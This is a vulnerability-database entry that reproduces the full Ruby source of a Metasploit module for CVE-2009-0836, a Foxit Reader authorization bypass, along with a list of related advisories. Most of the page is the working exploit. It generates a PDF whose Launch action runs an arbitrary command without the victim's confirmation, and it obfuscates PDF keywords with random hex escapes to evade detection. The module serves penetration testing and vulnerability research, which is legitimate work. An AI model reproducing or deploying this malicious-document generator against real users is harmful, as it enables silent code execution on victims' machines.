Lucene search
+L

Foxit Reader Authorization Bypass

🗓️ 29 Mar 2009 19:07:28Reported by MC <[email protected]>, Didier Stevens <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 36 Views

This module exploits an authorization bypass vulnerability in Foxit Reader build 1120. When an attacker creates a specially crafted pdf file containing an Open/Execute action, arbitrary commands can be executed without confirmation from the victim

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-0836
29 May 201815:50
circl
Core Security
Foxit Reader Multiple Vulnerabilities
9 Mar 200900:00
coresecurity
Check Point Advisories
Multiple PDF products Launch Action Command Code Execution (APSB10-15; CVE-2009-0836; CVE-2010-1240)
30 Jun 201000:00
checkpoint_advisories
CVE
CVE-2009-0836
10 Mar 200920:00
cve
Cvelist
CVE-2009-0836
10 Mar 200920:00
cvelist
canvas
Immunity Canvas: FOXITLAUNCHIT
10 Mar 200920:30
canvas
Tenable Nessus
Foxit Reader 2.x < 2.3 Build 3902 / 3.x < 3.0 Build 1506 Multiple Vulnerabilities
9 Mar 200900:00
nessus
NVD
CVE-2009-0836
10 Mar 200920:30
nvd
OpenVAS
Foxit Reader Multiple Vulnerabilities (Mar 2009)
17 Mar 200900:00
openvas
OpenVAS
Foxit Reader Multiple Vulnerabilities Mar-09
17 Mar 200900:00
openvas
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'zlib'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Foxit Reader Authorization Bypass',
      'Description'    => %q{
          This module exploits an authorization bypass vulnerability in Foxit Reader
        build 1120. When an attacker creates a specially crafted pdf file containing
        an Open/Execute action, arbitrary commands can be executed without confirmation
        from the victim.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', ],
      'References'     =>
        [
          [ 'CVE', '2009-0836' ],
          [ 'OSVDB', '55615'],
          [ 'BID', '34035' ],
        ],
      'DisclosureDate' => '2009-03-09'))

    register_options(
      [
        OptString.new('CMD',        [ false, 'The command to execute.', '/C/Windows/System32/calc.exe']),
        OptString.new('FILENAME',   [ false, 'The file name.',  'msf.pdf'])
      ])

  end

  def run
    exec = datastore['CMD']

    # Create the pdf
    pdf = make_pdf(exec)

    print_status("Creating '#{datastore['FILENAME']}' file...")

    file_create(pdf)
  end

  #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
  def n_obfu(str)
    result = ""
    str.scan(/./u) do |c|
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
        result << "#%x" % c.unpack('C*')[0]
      else
        result << c
      end
    end
    result
  end

  def random_non_ascii_string(count)
    result = ""
    count.times do
      result << (rand(128) + 128).chr
    end
    result
  end

  def io_def(id)
    "%d 0 obj" % id
  end

  def io_ref(id)
    "%d 0 R" % id
  end

  def make_pdf(exec)

    xref = []
    eol = "\x0d\x0a"
    endobj = "endobj" << eol

    # Randomize PDF version?
    pdf = "%%PDF-%d.%d" % [1 + rand(2), 1 + rand(5)] << eol
    pdf << "%" << random_non_ascii_string(4) << eol
    xref << pdf.length
    pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj
    xref << pdf.length
    pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj
    xref << pdf.length
    pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj
    xref << pdf.length
    pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj
    xref << pdf.length
    pdf << io_def(5) << "<</Type/Action/S/Launch/F << /F(#{exec})>>/NewWindow true\n" + io_ref(6) + ">>" << endobj
    xref << pdf.length
    pdf << endobj
    xrefPosition = pdf.length
    pdf << "xref" << eol
    pdf << "0 %d" % (xref.length + 1) << eol
    pdf << "0000000000 65535 f" << eol
    xref.each do |index|
      pdf << "%010d 00000 n" % index << eol
    end
    pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
    pdf << "startxref" << eol
    pdf << xrefPosition.to_s() << eol
    pdf << "%%EOF" << eol

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation